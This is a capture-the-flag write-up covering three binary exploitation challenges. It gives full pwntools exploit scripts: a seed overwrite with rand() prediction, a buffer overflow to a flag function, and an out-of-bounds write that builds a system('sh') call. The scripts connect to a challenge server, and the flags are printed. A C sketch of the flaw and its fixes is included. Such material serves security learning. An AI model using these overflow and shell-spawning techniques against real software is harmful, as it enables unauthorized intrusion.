
攻防世界 (Attack & Defense World) PWN, advanced section

dice_game

Overflow + random number

from pwn import *
from ctypes import *

context.log_level = 'debug'

# use the local glibc so rand() yields the same sequence as the server
libc = cdll.LoadLibrary("libc.so.6")

#io = process('./dice_game')
io = remote('111.198.29.45', '43224')

# fill the 0x40-byte name buffer and overwrite the adjacent seed with 1
payload = b'a' * 0x40 + p64(1)
io.sendlineafter(b"Welcome, let me know your name: ", payload)

# replay the sequence the program generates after srand(1)
libc.srand(1)
for i in range(50):
    randnum = libc.rand() % 6 + 1
    io.sendlineafter(b"point(1~6): ", str(randnum).encode())

io.recvline()
io.recvline()
flag = io.recvline()
print(flag)

flag

cyberpeace{d852e3567fa642894b4bad82042d53a5}

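As an added example (not the challenge's source or the author's code), a C sketch of the pattern this solve relies on, a PRNG seed stored directly after an unbounded name buffer, next to the two fixes a defender would apply: a bounded copy and a seed taken from the kernel CSPRNG. The struct layout, NAME_LEN and all function names are assumptions for illustration.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define NAME_LEN 0x40   /* the name buffer size the payload above fills */

/* Assumed layout: the name buffer sits directly below the seed. */
struct game_frame {
    char               name[NAME_LEN];
    unsigned long long seed;              /* 8 bytes, matching p64(1) */
};

/* The weakness: the rolls are a pure function of the seed, so whoever controls
   the seed knows every roll (what the solve script reproduces with ctypes). */
void predict_rolls(unsigned int seed, int *out, int n) {
    srand(seed);
    for (int i = 0; i < n; i++) out[i] = rand() % 6 + 1;
}

/* Fix 1: bounded copy that truncates instead of writing past name[]. */
void read_name_bounded(struct game_frame *f, const char *buf, size_t len) {
    if (len > NAME_LEN - 1) len = NAME_LEN - 1;
    memcpy(f->name, buf, len);
    f->name[len] = '\0';
}

/* Fix 2: seed from the kernel CSPRNG rather than a value next to user input.
   Returns 1 on success, 0 if /dev/urandom could not be read. */
int secure_seed(unsigned int *seed) {
    FILE *fp = fopen("/dev/urandom", "rb");
    if (!fp) return 0;
    size_t got = fread(seed, sizeof *seed, 1, fp);
    fclose(fp);
    return got == 1;
}

/* Replays the payload above ('a' * 0x40 + p64(1)) against an unbounded copy
   (the defect) and against read_name_bounded. Returns 1 when the unbounded
   copy set seed to 1 while the bounded one left it untouched. */
int bounded_read_preserves_seed(void) {
    char buf[sizeof(struct game_frame)] = {0};   /* constructed 0x48-byte input */
    memset(buf, 'a', NAME_LEN);
    buf[NAME_LEN] = 1;                            /* little-endian 1 */
    struct game_frame a = { .seed = 0xdeadbeef }, b = a;
    memcpy(&a, buf, sizeof buf);                  /* unbounded: runs from name[0] into seed */
    read_name_bounded(&b, buf, sizeof buf);
    return a.seed == 1 && b.seed == 0xdeadbeef;
}
```
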
forget

Overflow: overwrite v3 with the address of the get-flag function; using \x47 as the padding byte makes v14 equal 1.

from pwn import *

context.log_level = 'debug'

#io = process('./forget')
io = remote('111.198.29.45', '32456')

# 32 bytes of \x47 padding (so v14 ends up as 1), then the get-flag function address over v3
payload = b'\x47' * 32 + p32(0x080486CC)

io.sendlineafter(b'>', b'hvnt3r')
io.sendlineafter(b'Enter the string to be validate\n>', payload)

print(io.recvline())

flag

cyberpeace{36db2d4142ff5529b834e236e2e3c641}

stack2

The array index is never range-checked, which allows an out-of-bounds write:

puts("which number to change:");
__isoc99_scanf("%d", &v5);          // v5 is the index, taken straight from input
puts("new number:");
__isoc99_scanf("%d", &v7);
v13[v5] = v7;                       // no check that v5 lies within v13

Set a breakpoint to confirm that the distance from the start of v13 to ebp is 0x84, then build a stack frame that calls system with the "sh" string.

from pwn import *

context.log_level = 'debug'

#io = process('./6abe739ff2af4a7fa6b3c89904389817')
io = remote('111.198.29.45', '48396')

io.sendlineafter(b'How many numbers you have:\n', b'1')
io.sendlineafter(b'Give me your numbers\n', b'1')

# menu option 3 writes one byte at v13[offset]; offset 0x84 reaches the return address
def write_addr(offset, byte):
    io.sendlineafter(b'5. exit\n', b'3')
    io.sendlineafter(b'which number to change:\n', str(offset).encode())
    io.sendlineafter(b'new number:\n', str(byte).encode())

# 08048450 sys_plt: write system@plt over the return address, little-endian
write_addr(0x84, 0x50)
write_addr(0x85, 0x84)
write_addr(0x86, 0x04)
write_addr(0x87, 0x08)

# 08048987 string_sh: address of "sh" as system's argument, 8 bytes after the return address
write_addr(0x84 + 8, 0x87)
write_addr(0x85 + 8, 0x89)
write_addr(0x86 + 8, 0x04)
write_addr(0x87 + 8, 0x08)

# option 5 returns from the function, landing in system("sh")
io.sendlineafter(b'5. exit\n', b'5')

io.interactive()

flag

cyberpeace{4331b59d20df98308bc8ad86307b27a4}